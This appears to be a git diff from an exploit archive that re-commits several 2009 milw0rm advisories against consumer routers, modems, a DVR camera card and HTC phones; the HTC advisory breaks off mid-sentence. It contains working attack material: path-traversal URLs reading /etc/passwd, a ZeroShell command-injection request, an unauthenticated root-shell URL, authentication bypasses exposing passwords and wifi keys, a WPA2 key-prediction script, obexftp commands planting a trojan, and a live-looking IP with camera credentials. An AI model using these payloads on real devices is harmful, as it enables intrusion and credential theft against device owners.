vulnerabilities + +Linked XSS vulnerability found in scripts: + +user/help/help.shtml +user/help/general_help_user.shtml + +Attacker can inject XSS script in URL. + +Example: + +http://[server]/user/help/help.shtml? +http://[server]/user/help/general_help_user.shtml? + + + +Solution +******** + +Vendor decided that this vulnerability is not critical and there is no +patches for this firmware. But maybe he will patch issues on the next firmware release + + +Vendore response: + +[13.01.2009]: "We don't see any major vulnerability issues with the current firmware of Axis 70U but we will consider the mentioned issues on the next firmware release." + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. + +Contact: research [at] dsec [dot] ru + http://www.dsecrg.com + http://www.dsec.ru + +# milw0rm.com [2009-01-21] diff --git a/platforms/hardware/remote/7915.txt b/platforms/hardware/remote/7915.txt index 48169c05b..c7a304647 100755 --- a/platforms/hardware/remote/7915.txt +++ b/platforms/hardware/remote/7915.txt @@ -1,27 +1,27 @@ -##################################################################################### -# -# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities -# Author : Usman Saeed -# Company : Xc0re Security Reasearch Group -# Homepage : http://www.xc0re.net -# -##################################################################################### - - -[Note: User needs to logged in! ] - -[*] Attack type : Remote - -[*] Patch Status : Unpatched - -[*] Exploitation : - - [+] Directory traversal - http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs - - [+] XSS - - http://Hostname/cgi-bin/sysconf.cgi?page=">"&action=request&sid=AeoFSFoI4lDs - - -# milw0rm.com [2009-01-29] +##################################################################################### +# +# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities +# Author : Usman Saeed +# Company : Xc0re Security Reasearch Group +# Homepage : http://www.xc0re.net +# +##################################################################################### + + +[Note: User needs to logged in! ] + +[*] Attack type : Remote + +[*] Patch Status : Unpatched + +[*] Exploitation : + + [+] Directory traversal + http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs + + [+] XSS + + http://Hostname/cgi-bin/sysconf.cgi?page=">"&action=request&sid=AeoFSFoI4lDs + + +# milw0rm.com [2009-01-29] diff --git a/platforms/hardware/remote/8022.txt b/platforms/hardware/remote/8022.txt index c41a457fc..42f386cef 100755 --- a/platforms/hardware/remote/8022.txt +++ b/platforms/hardware/remote/8022.txt @@ -1,16 +1,16 @@ -==================================================== -3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass - -Original Advisory: -http://www.ikkisoft.com/stuff/LC-2008-05.txt - -luca.carettoni[at]ikkisoft[dot]com -==================================================== - -An unauthenticated user may directly invoke the "SaveCfgFile" CGI program and -easily download the system configuration containing configuration information, -users, passwords, wifi keys and other sensitive information. - -http:///SaveCfgFile.cgi - -# milw0rm.com [2009-02-09] +==================================================== +3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass + +Original Advisory: +http://www.ikkisoft.com/stuff/LC-2008-05.txt + +luca.carettoni[at]ikkisoft[dot]com +==================================================== + +An unauthenticated user may directly invoke the "SaveCfgFile" CGI program and +easily download the system configuration containing configuration information, +users, passwords, wifi keys and other sensitive information. + +http:///SaveCfgFile.cgi + +# milw0rm.com [2009-02-09] diff --git a/platforms/hardware/remote/8023.txt b/platforms/hardware/remote/8023.txt index 6e25e12a6..4aef15a08 100755 --- a/platforms/hardware/remote/8023.txt +++ b/platforms/hardware/remote/8023.txt @@ -1,34 +1,34 @@ -==================================================== -ZeroShell <= 1.0beta11 Remote Code Execution - -Original Advisory: -http://www.ikkisoft.com/stuff/LC-2009-01.txt - -luca.carettoni[at]ikkisoft[dot]com -==================================================== - - -ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution -for servers and embedded devices. This Linux distro can be configured -and managed with an easy to use web console. - -ZeroShell is prone to an arbitrary code execution vulnerability due to -an improper input validation mechanism. An aggressor may abuse this -weakness in order to compromise the entire system. -Authentication is not required in order to exploit this flaw. - -[Proof of Concept] - -/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;;%22 - -In addition to the Unix commands, it is possible to abuse the -ZeroShell scripts themself. For instance it is likely to use the -"getkey" script in order to retrieve remote files, including the content -in the html page. - -{HTTP REQUEST} -GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22; -/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1 -Host: - -# milw0rm.com [2009-02-09] +==================================================== +ZeroShell <= 1.0beta11 Remote Code Execution + +Original Advisory: +http://www.ikkisoft.com/stuff/LC-2009-01.txt + +luca.carettoni[at]ikkisoft[dot]com +==================================================== + + +ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution +for servers and embedded devices. This Linux distro can be configured +and managed with an easy to use web console. + +ZeroShell is prone to an arbitrary code execution vulnerability due to +an improper input validation mechanism. An aggressor may abuse this +weakness in order to compromise the entire system. +Authentication is not required in order to exploit this flaw. + +[Proof of Concept] + +/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;;%22 + +In addition to the Unix commands, it is possible to abuse the +ZeroShell scripts themself. For instance it is likely to use the +"getkey" script in order to retrieve remote files, including the content +in the html page. + +{HTTP REQUEST} +GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22; +/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1 +Host: + +# milw0rm.com [2009-02-09] diff --git a/platforms/hardware/remote/8096.txt b/platforms/hardware/remote/8096.txt index 76600c4cc..e481fe1bf 100755 --- a/platforms/hardware/remote/8096.txt +++ b/platforms/hardware/remote/8096.txt @@ -1,63 +1,63 @@ -XSS Attack using SMS to Optus/Huawei E960 HSDPA Router - -Synopsis --------- - -Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is -vulnerable to XSS attack using SMS. One of the feature of this router -is the ability to send and receive SMS through its web interface. The -SMS text is presented unescaped/unfiltered on the inbox view, and an -attacker can craft malicious short messages to gain control over -victims router. - -Details --------- -The first 32 characters of every incoming SMS is presented in -unescaped form in the inbox view. The 32 characters limit can be -overcome by using several messages, and inserting javascript comment -to merge the current message with the next one. - -Example: - -First message ends with /* which will comment the all the HTML code up -to the second message - - - -Note that newest message is presented first, so the order of the SMS -sending must be reversed. - -Impact ------- -An attacker can -- get victim's PPP password by accessing /js/connection.js -- disconnect victim's internet connection -- send SMS with victim's router -- gain access to victim's WIFI password - -Recovery --------- -After an attack is performed, the inbox page can not be used to delete -the received messages (because the delete button is not -available/visible). To remove offending messages from the inbox, -telnet to the router with username 'admin' and password 'admin'. -Huawei E960 uses busybox shell, so standard rm command can be used to -remove the messages (it is located at /tmp/sms/inbox_sms). After -removing the message content, the deleted messages will still be in -the inbox index, but it can now be removed from the inbox page. - - -Credits -------- -Rizki Wicaksono (http://www.ilmuhacking.com) found this vulnerability. -The Indonesian article at -http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/ -gives more detail about this vulnerability. This English -translation/summary was done by Yohanes Nugroho. - -# milw0rm.com [2009-02-23] +XSS Attack using SMS to Optus/Huawei E960 HSDPA Router + +Synopsis +-------- + +Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is +vulnerable to XSS attack using SMS. One of the feature of this router +is the ability to send and receive SMS through its web interface. The +SMS text is presented unescaped/unfiltered on the inbox view, and an +attacker can craft malicious short messages to gain control over +victims router. + +Details +-------- +The first 32 characters of every incoming SMS is presented in +unescaped form in the inbox view. The 32 characters limit can be +overcome by using several messages, and inserting javascript comment +to merge the current message with the next one. + +Example: + +First message ends with /* which will comment the all the HTML code up +to the second message + + + +Note that newest message is presented first, so the order of the SMS +sending must be reversed. + +Impact +------ +An attacker can +- get victim's PPP password by accessing /js/connection.js +- disconnect victim's internet connection +- send SMS with victim's router +- gain access to victim's WIFI password + +Recovery +-------- +After an attack is performed, the inbox page can not be used to delete +the received messages (because the delete button is not +available/visible). To remove offending messages from the inbox, +telnet to the router with username 'admin' and password 'admin'. +Huawei E960 uses busybox shell, so standard rm command can be used to +remove the messages (it is located at /tmp/sms/inbox_sms). After +removing the message content, the deleted messages will still be in +the inbox index, but it can now be removed from the inbox page. + + +Credits +------- +Rizki Wicaksono (http://www.ilmuhacking.com) found this vulnerability. +The Indonesian article at +http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/ +gives more detail about this vulnerability. This English +translation/summary was done by Yohanes Nugroho. + +# milw0rm.com [2009-02-23] diff --git a/platforms/hardware/remote/829.c b/platforms/hardware/remote/829.c index 82a6a502d..98a01924c 100755 --- a/platforms/hardware/remote/829.c +++ b/platforms/hardware/remote/829.c @@ -88,6 +88,6 @@ int main(int argc, char *argv[]) { close(fd); return 1; -} - -// milw0rm.com [2005-02-19] +} + +// milw0rm.com [2005-02-19] diff --git a/platforms/hardware/remote/8316.txt b/platforms/hardware/remote/8316.txt index 1287a35ad..5c50a6889 100755 --- a/platforms/hardware/remote/8316.txt +++ b/platforms/hardware/remote/8316.txt @@ -1,41 +1,41 @@ -NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability: NOKIA Siemens FlexiISN - -Remote: Yes - -Local: No - -Class: Input Validation Error - -Critical: Moderately critical - -OS : FlexiISN (GGSN) FISN 3.1 - -URL 1 for bypassing authentication on AAA Configuration: http://[Flexi-ISN IP]/cgi-bin/aaa.tcl? - -URL 2 for bypassing authentication on Aggregation Class Configuration : http://[Flexi-ISN IP]/cgi-bin/aggr_config.tcl? - -URL 3 for bypassing authentication on GGSN general Configuration : http://[Flexi-ISN IP]/opt/cgi-bin/ggsn/cgi.tcl?page=ggsnconf - -URL 4 for bypassing authentication on Network Access & services : http://[Flexi-ISN IP]/opt/cgi-bin/services.tcl?instance=default - -Published: March 30, 2009 - -Discovered by: TaMbaRuS (tambarus@gmail.com) - -Site: www.nokiasiemensnetworks.com - -Greetz: Mr. Gabriel Waller from NSN for all his support for researching on the vulnerabilities. - -Description: - -The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities, -is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable -flexible charging of data services. The systems integration services ensure seamless consumer experience, -while managing an increasingly complex combination of new processes and systems. - -With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a -GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet -inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming, -content download thus enabling different charging models based on the type of data service used. - -# milw0rm.com [2009-03-30] +NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability: NOKIA Siemens FlexiISN + +Remote: Yes + +Local: No + +Class: Input Validation Error + +Critical: Moderately critical + +OS : FlexiISN (GGSN) FISN 3.1 + +URL 1 for bypassing authentication on AAA Configuration: http://[Flexi-ISN IP]/cgi-bin/aaa.tcl? + +URL 2 for bypassing authentication on Aggregation Class Configuration : http://[Flexi-ISN IP]/cgi-bin/aggr_config.tcl? + +URL 3 for bypassing authentication on GGSN general Configuration : http://[Flexi-ISN IP]/opt/cgi-bin/ggsn/cgi.tcl?page=ggsnconf + +URL 4 for bypassing authentication on Network Access & services : http://[Flexi-ISN IP]/opt/cgi-bin/services.tcl?instance=default + +Published: March 30, 2009 + +Discovered by: TaMbaRuS (tambarus@gmail.com) + +Site: www.nokiasiemensnetworks.com + +Greetz: Mr. Gabriel Waller from NSN for all his support for researching on the vulnerabilities. + +Description: + +The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities, +is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable +flexible charging of data services. The systems integration services ensure seamless consumer experience, +while managing an increasingly complex combination of new processes and systems. + +With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a +GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet +inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming, +content download thus enabling different charging models based on the type of data service used. + +# milw0rm.com [2009-03-30] diff --git a/platforms/hardware/remote/8359.py b/platforms/hardware/remote/8359.py index 488d7bfe4..7e4ffd241 100755 --- a/platforms/hardware/remote/8359.py +++ b/platforms/hardware/remote/8359.py @@ -1,31 +1,31 @@ -#!/usr/bin/python -# -# Pirelli Discus DRG A225 WiFi router -# Default WPA2-PSK algorithm vulnerability -# -# paper: http://milw0rm.com/papers/313 -# -# With this code we can predict the WPA2-PSK key... -# -# Hacked up by Muris Kurgas aka j0rgan -# j0rgan (-@-) remote-exploit.org -# http://www.remote-exploit.org -# -# Use for education or legal penetration testing purposes..... -# -import sys - -def hex2dec(s): - return int(s, 16) - -if len(sys.argv) < 2 or len(sys.argv[1]) != 6: - print "\r\nEnter the last 6 chars from Discus SSID" - print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n" - exit() -const = hex2dec('D0EC31') -inp = hex2dec(sys.argv[1]) -result = (inp - const)/4 - -print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result) - -# milw0rm.com [2009-04-06] +#!/usr/bin/python +# +# Pirelli Discus DRG A225 WiFi router +# Default WPA2-PSK algorithm vulnerability +# +# paper: http://milw0rm.com/papers/313 +# +# With this code we can predict the WPA2-PSK key... +# +# Hacked up by Muris Kurgas aka j0rgan +# j0rgan (-@-) remote-exploit.org +# http://www.remote-exploit.org +# +# Use for education or legal penetration testing purposes..... +# +import sys + +def hex2dec(s): + return int(s, 16) + +if len(sys.argv) < 2 or len(sys.argv[1]) != 6: + print "\r\nEnter the last 6 chars from Discus SSID" + print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n" + exit() +const = hex2dec('D0EC31') +inp = hex2dec(sys.argv[1]) +result = (inp - const)/4 + +print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result) + +# milw0rm.com [2009-04-06] diff --git a/platforms/hardware/remote/8696.txt b/platforms/hardware/remote/8696.txt index 3bf582768..00b5ddec3 100755 --- a/platforms/hardware/remote/8696.txt +++ b/platforms/hardware/remote/8696.txt @@ -1,32 +1,32 @@ -D-Link Captcha Bypass -------------------------------------- -D-Link released new firmware designed to protect against malware that -alters DNS settings by logging in to the router using default administrative -credentials. There is a flaw in the captcha authentication system that allows -an attacker to glean your WiFi WPA pass phrase from the router with only user-level -access, and without properly solving the captcha. - -When you login with the captcha enabled, the request looks like this: - - GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2 - -The hash is a salted MD5 hash of your password, the auth_code is the captcha value that -you entered, and the auth_id is unique to the captcha image that you viewed -(this presumably allows the router to check the auth_code against the proper captcha image). -The problem is that if you leave off the auth_code and auth_id values, some pages in the -D-Link Web interface think that you’ve properly authenticated, as long as you get -the hash right: - - GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a - -Most notably, once you’ve made the request to post_login.xml, you can activate -WPS with the following request: - - GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 - -When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and -retrieve the WPA passphrase directly from the router. - -More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/ - -# milw0rm.com [2009-05-15] +D-Link Captcha Bypass +------------------------------------- +D-Link released new firmware designed to protect against malware that +alters DNS settings by logging in to the router using default administrative +credentials. There is a flaw in the captcha authentication system that allows +an attacker to glean your WiFi WPA pass phrase from the router with only user-level +access, and without properly solving the captcha. + +When you login with the captcha enabled, the request looks like this: + + GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2 + +The hash is a salted MD5 hash of your password, the auth_code is the captcha value that +you entered, and the auth_id is unique to the captcha image that you viewed +(this presumably allows the router to check the auth_code against the proper captcha image). +The problem is that if you leave off the auth_code and auth_id values, some pages in the +D-Link Web interface think that you’ve properly authenticated, as long as you get +the hash right: + + GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a + +Most notably, once you’ve made the request to post_login.xml, you can activate +WPS with the following request: + + GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 + +When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and +retrieve the WPA passphrase directly from the router. + +More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/ + +# milw0rm.com [2009-05-15] diff --git a/platforms/hardware/remote/8846.txt b/platforms/hardware/remote/8846.txt index 67c951c2f..263280ec7 100755 --- a/platforms/hardware/remote/8846.txt +++ b/platforms/hardware/remote/8846.txt @@ -1,22 +1,22 @@ -1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. - -2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface. - -3. When 'system' paramether is passed to the script it allows running OS shell commands (as root). - -4. PoC: -GET request to: -http://192.168.1.1/cgi-bin/script?system%20whoami - -Returns: -root - -5. Using CSRF attack one could remotely own a router using for example simple html tags pointing to http://192.168.1.1/... - -6. The issue was tested on firmware: 66.34.1 - -7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched). - -8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise - -# milw0rm.com [2009-06-01] +1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. + +2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface. + +3. When 'system' paramether is passed to the script it allows running OS shell commands (as root). + +4. PoC: +GET request to: +http://192.168.1.1/cgi-bin/script?system%20whoami + +Returns: +root + +5. Using CSRF attack one could remotely own a router using for example simple html tags pointing to http://192.168.1.1/... + +6. The issue was tested on firmware: 66.34.1 + +7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched). + +8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise + +# milw0rm.com [2009-06-01] diff --git a/platforms/hardware/remote/8963.txt b/platforms/hardware/remote/8963.txt index 644ef8f1f..57772feae 100755 --- a/platforms/hardware/remote/8963.txt +++ b/platforms/hardware/remote/8963.txt @@ -1,103 +1,103 @@ -Product Name: Netgear DG632 Router -Vendor: http://www.netgear.com -Date: 15 June, 2009 -Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > -Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt -Discovered: 18 November, 2006 -Disclosed: 15 June, 2009 - -I. DESCRIPTION - -The Netgear DG632 router has a web interface which runs on port 80. -This allows an admin to login and administer the device's settings. -Authentication of this web interface is handled by a script called -"webcm" residing in "/cgi-bin/" which redirects to the relevant pages -depending on successful user authentication. Vulnerabilities in this -interface enable an attacker to access files and data without -authentication. - -II. DETAILS - -The "webcm" script handles user authentication and attempts to load -"indextop.htm" (via javascript below). The "indextop.htm" page requires -authentication (HTTP Basic Authorization). - ---- - - - - -Loading file ... -
- - - ---- - -If a valid password to the default "admin" user is supplied, the script -then continues to load the "indextop.htm" page and continues to load the -other frames based on a hidden field. If user authentication is -unsuccessful, the user is returned back to "../cgi-bin/webcm". It is -possible to bypass the "webcm" script and access specific files directly -without the need for authentication. - -Normal use: -http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm - -This would ask for the user to authenticate and would refuse access to -this file if authentication details were not known. All the script is -doing is making sure authentication is forced upon the user. The same -"stattbl.htm" file can be accessed without having to provide any -authentication using the following URL: - -http://TARGET_IP/html/stattbl.htm - -Another example: -http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm -(returns 401 - Forbidden) - -Bypassing the "webcm" script: -http://192.168.0.1/html/modemmenu.htm -(returns 200 - OK) - -In the example above (modemmenu.htm), the full source can be viewed -which discloses further directories and files within the javascript of -the page. A sample of files disclosed within modemmenu.htm and available -to download are: - -/html/onload.htm -/html/form.css -/gateway/commands/saveconfig.html -/html/utility.js (full source) - -There are many other files that are accessible by calling them directly -instead of going via the "webcm" script, the above are just a sample. In -addition, it is possible to specify paths to the "webcm" script as shown -below: - -http://TARGET_IP/cgi-bin/webcm?nextpage=../../ - -This allows an attacker to enumerate what files and directories exist -within the www root directory and beyond by using 200, 403 and 404 -errors as a guide. - -Affected Versions: Firmware V3.4.0_ap (others unknown) - -III. VENDOR RESPONSE - -12 June, 2009 - Contacted vendor. -15 June, 2009 - Vendor responded. Stated the DG632 is an end of life -product and is no longer supported in a production and development -sense, as such, there will be no further firmware releases to resolve -this issue. - -IV. CREDIT - -Discovered by Tom Neaves - -# milw0rm.com [2009-06-15] +Product Name: Netgear DG632 Router +Vendor: http://www.netgear.com +Date: 15 June, 2009 +Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > +Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt +Discovered: 18 November, 2006 +Disclosed: 15 June, 2009 + +I. DESCRIPTION + +The Netgear DG632 router has a web interface which runs on port 80. +This allows an admin to login and administer the device's settings. +Authentication of this web interface is handled by a script called +"webcm" residing in "/cgi-bin/" which redirects to the relevant pages +depending on successful user authentication. Vulnerabilities in this +interface enable an attacker to access files and data without +authentication. + +II. DETAILS + +The "webcm" script handles user authentication and attempts to load +"indextop.htm" (via javascript below). The "indextop.htm" page requires +authentication (HTTP Basic Authorization). + +--- + + + + +Loading file ... +
+ + + +--- + +If a valid password to the default "admin" user is supplied, the script +then continues to load the "indextop.htm" page and continues to load the +other frames based on a hidden field. If user authentication is +unsuccessful, the user is returned back to "../cgi-bin/webcm". It is +possible to bypass the "webcm" script and access specific files directly +without the need for authentication. + +Normal use: +http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm + +This would ask for the user to authenticate and would refuse access to +this file if authentication details were not known. All the script is +doing is making sure authentication is forced upon the user. The same +"stattbl.htm" file can be accessed without having to provide any +authentication using the following URL: + +http://TARGET_IP/html/stattbl.htm + +Another example: +http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm +(returns 401 - Forbidden) + +Bypassing the "webcm" script: +http://192.168.0.1/html/modemmenu.htm +(returns 200 - OK) + +In the example above (modemmenu.htm), the full source can be viewed +which discloses further directories and files within the javascript of +the page. A sample of files disclosed within modemmenu.htm and available +to download are: + +/html/onload.htm +/html/form.css +/gateway/commands/saveconfig.html +/html/utility.js (full source) + +There are many other files that are accessible by calling them directly +instead of going via the "webcm" script, the above are just a sample. In +addition, it is possible to specify paths to the "webcm" script as shown +below: + +http://TARGET_IP/cgi-bin/webcm?nextpage=../../ + +This allows an attacker to enumerate what files and directories exist +within the www root directory and beyond by using 200, 403 and 404 +errors as a guide. + +Affected Versions: Firmware V3.4.0_ap (others unknown) + +III. VENDOR RESPONSE + +12 June, 2009 - Contacted vendor. +15 June, 2009 - Vendor responded. Stated the DG632 is an end of life +product and is no longer supported in a production and development +sense, as such, there will be no further firmware releases to resolve +this issue. + +IV. CREDIT + +Discovered by Tom Neaves + +# milw0rm.com [2009-06-15] diff --git a/platforms/hardware/remote/9066.txt b/platforms/hardware/remote/9066.txt index f7c07e995..71128bf29 100755 --- a/platforms/hardware/remote/9066.txt +++ b/platforms/hardware/remote/9066.txt @@ -1,36 +1,36 @@ -------------------------------------------------- -SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug -------------------------------------------------- -Author : Septemb0x -Web Site : www.ozkanbozkurt.com -Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673 -Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini -D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level Reset to: Low Or Download" -------------------------------------------------- -Exploit: http://[sitename-ipadress]/dvr.ini -------------------------------------------------- -Example: http://88.249.248.177/dvr.ini -Show; -[PASSWORD] -administrator= -password_a= -user= -password= -enable=0 -user0=ozcan = Camera Username -password0=3893 = Camera Password -right0=223 -encode=1 -num=2 -user1=yurt -password1=yurt -right1=223 -. -. -. -... Login The Camera :) -------------------------------------------------- -Greetz : BHDR, BARCOD3 -------------------------------------------------- - -# milw0rm.com [2009-07-01] +------------------------------------------------- +SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug +------------------------------------------------- +Author : Septemb0x +Web Site : www.ozkanbozkurt.com +Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673 +Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini +D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level Reset to: Low Or Download" +------------------------------------------------- +Exploit: http://[sitename-ipadress]/dvr.ini +------------------------------------------------- +Example: http://88.249.248.177/dvr.ini +Show; +[PASSWORD] +administrator= +password_a= +user= +password= +enable=0 +user0=ozcan = Camera Username +password0=3893 = Camera Password +right0=223 +encode=1 +num=2 +user1=yurt +password1=yurt +right1=223 +. +. +. +... Login The Camera :) +------------------------------------------------- +Greetz : BHDR, BARCOD3 +------------------------------------------------- + +# milw0rm.com [2009-07-01] diff --git a/platforms/hardware/remote/9117.txt b/platforms/hardware/remote/9117.txt index 071431ad4..6ab004b23 100755 --- a/platforms/hardware/remote/9117.txt +++ b/platforms/hardware/remote/9117.txt @@ -1,116 +1,116 @@ -I shall complete the information related to Bugtraq ID: 33359 - -Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal -Author: Alberto Moreno Tablado -Vendor: HTC -Vulnerable Products: -- HTC devices running Windows Mobile 6 -- HTC devices running Windows Mobile 6.1 -Non vulnerable products: -- HTC devices running Windows Mobile 5.0 -- Other vendors’ Windows Mobile devices -References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html - -Summary: -HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder. - -Description: -There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically. - -A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. - -The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user. - -The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder. - -A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device: - -1) Browse directories located out of the limits of the default shared folder - -An attacker can discover the structure of the file system and access to any directory within it, including: -- The flash hard drive -- The external storage card -- The internal mass storage memory, included in specific HTC devices - -2) Download files without permission - -An attacker can download sensitive files located anywhere in the file system, such as: -- personal pictures and documents located in \My Documents or any other directory -- Contacts, Calendar & Tasks information located in \PIM.vol -- Temporary internet cache and cookies located in \Windows\Profiles\guest\ -- emails located in \Windows\Messaging - -gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging" -Browsing 00:17:83:02:BA:3C ... -Channel: 4 -Connecting...done -Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done - - - - - - - - -done -Disconnecting...done -gospel@gospel-shift:~/bluez$ - -3) Upload malicious files - -An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits. - -gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe -Browsing 00:17:83:02:BA:3C ... -Channel: 4 -Connecting...done -Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done -Sending "trojan.exe"...\done -Disconnecting...done -gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup" -Browsing 00:17:83:02:BA:3C ... -Channel: 4 -Connecting...done -Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done - - - - - - - -done -Disconnecting...done -gospel@gospel-shift:~/bluez$ - -About affected and non affected products: -The following HTC devices are affected by this vulnerability: -- HTC devices running Windows Mobile 6 Professional -- HTC devices running Windows Mobile 6 Standard -- HTC devices running Windows Mobile 6.1 Professional -- HTC devices running Windows Mobile 6.1 Standard - -You can find a list of tested HTC devices proved to be vulnerable at http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html#AffectedProducts - -HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version. - -Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ... - -Vendor Status: -The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also 